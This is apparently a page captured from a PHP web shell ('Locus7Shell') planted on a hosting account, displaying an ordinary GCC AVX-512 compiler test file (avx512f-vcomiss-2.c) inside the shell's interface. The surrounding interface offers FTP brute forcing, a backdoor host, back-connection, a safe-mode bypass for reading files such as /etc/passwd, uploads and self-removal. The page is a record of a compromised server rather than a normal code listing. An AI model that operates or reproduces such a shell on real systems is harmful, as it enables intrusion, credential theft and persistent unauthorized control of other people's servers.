Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512f-vcomiss-2.c (3.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-require-effective-target avx512f } */
/* { dg-options "-O2 -mavx512f" } */

#include "avx512f-check.h"

static inline void __attribute__ ((__always_inline__))
check_cmp (float s1, float s2, const int imm, int expected)
{
  __m128 source1 = _mm_load_ss (&s1);
  __m128 source2 = _mm_load_ss (&s2);
  int res = _mm_comi_round_ss (source1, source2, imm,
                   _MM_FROUND_NO_EXC);
  if (expected != res)
    abort();
}

static void
do_check (float s1, float s2)
{
  check_cmp (s1, s2, _CMP_EQ_OQ,
         !__builtin_isunordered (s1, s2) && s1 == s2);
  check_cmp (s1, s2, _CMP_LT_OS,
         !__builtin_isunordered (s1, s2) && s1 < s2);
  check_cmp (s1, s2, _CMP_LE_OS,
         !__builtin_isunordered (s1, s2) && s1 <= s2);
  check_cmp (s1, s2, _CMP_UNORD_Q,
         __builtin_isunordered (s1, s2));
  check_cmp (s1, s2, _CMP_NEQ_UQ,
         __builtin_isunordered (s1, s2) || s1 != s2);
  check_cmp (s1, s2, _CMP_NLT_US,
         __builtin_isunordered (s1, s2) || s1 >= s2);
  check_cmp (s1, s2, _CMP_NLE_US,
         __builtin_isunordered (s1, s2) || s1 > s2);
  check_cmp (s1, s2, _CMP_ORD_Q,
         !__builtin_isunordered (s1, s2));
  check_cmp (s1, s2, _CMP_EQ_UQ,
         __builtin_isunordered (s1, s2) || s1 == s2);
  check_cmp (s1, s2, _CMP_NGE_US,
         __builtin_isunordered (s1, s2) || s1 < s2);
  check_cmp (s1, s2, _CMP_NGT_US,
         __builtin_isunordered (s1, s2) || s1 <= s2);
  check_cmp (s1, s2, _CMP_FALSE_OQ, 0);
  check_cmp (s1, s2, _CMP_NEQ_OQ,
         !__builtin_isunordered (s1, s2) && s1 != s2);
  check_cmp (s1, s2, _CMP_GE_OS,
         !__builtin_isunordered (s1, s2) && s1 >= s2);
  check_cmp (s1, s2, _CMP_GT_OS,
         !__builtin_isunordered (s1, s2) && s1 > s2);
  check_cmp (s1, s2, _CMP_TRUE_UQ, 1);
  check_cmp (s1, s2, _CMP_EQ_OS,
         !__builtin_isunordered (s1, s2) && s1 == s2);
  check_cmp (s1, s2, _CMP_LT_OQ,
         !__builtin_isunordered (s1, s2) && s1 < s2);
  check_cmp (s1, s2, _CMP_LE_OQ,
         !__builtin_isunordered (s1, s2) && s1 <= s2);
  check_cmp (s1, s2, _CMP_UNORD_S,
         __builtin_isunordered (s1, s2));
  check_cmp (s1, s2, _CMP_NEQ_US,
         __builtin_isunordered (s1, s2) || s1 != s2);
  check_cmp (s1, s2, _CMP_NLT_UQ,
         __builtin_isunordered (s1, s2) || s1 >= s2);
  check_cmp (s1, s2, _CMP_NLE_UQ,
         __builtin_isunordered (s1, s2) || s1 > s2);
  check_cmp (s1, s2, _CMP_ORD_S, !__builtin_isunordered (s1, s2));
  check_cmp (s1, s2, _CMP_EQ_US,
         __builtin_isunordered (s1, s2) || s1 == s2);
  check_cmp (s1, s2, _CMP_NGE_UQ,
         __builtin_isunordered (s1, s2) || s1 < s2);
  check_cmp (s1, s2, _CMP_NGT_UQ,
         __builtin_isunordered (s1, s2) || s1 <= s2);
  check_cmp (s1, s2, _CMP_FALSE_OS, 0);
  check_cmp (s1, s2, _CMP_NEQ_OS,
         !__builtin_isunordered (s1, s2) && s1 != s2);
  check_cmp (s1, s2, _CMP_GE_OQ,
         !__builtin_isunordered (s1, s2) && s1 >= s2);
  check_cmp (s1, s2, _CMP_GT_OQ,
         !__builtin_isunordered (s1, s2) && s1 > s2);
  check_cmp (s1, s2, _CMP_TRUE_US, 1);
}

static void
avx512f_test (void)
{
  struct
    {
      float x1;
      float x2;
    }
  inputs[] =
    {
      { 4.3, 2.18 },
      { -4.3, 3.18 },
      { __builtin_nanf (""), -5.8 },
      { -4.8, __builtin_nansf ("") },
      { 3.8, __builtin_nansf ("") },
      { 4.2, 4.2 },
      { __builtin_nanf (""), __builtin_nansf ("") },
    };
  int i;

  for (i = 0; i < sizeof (inputs) / sizeof (inputs[0]); i++)
    do_check (inputs[i].x1, inputs[i].x2);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--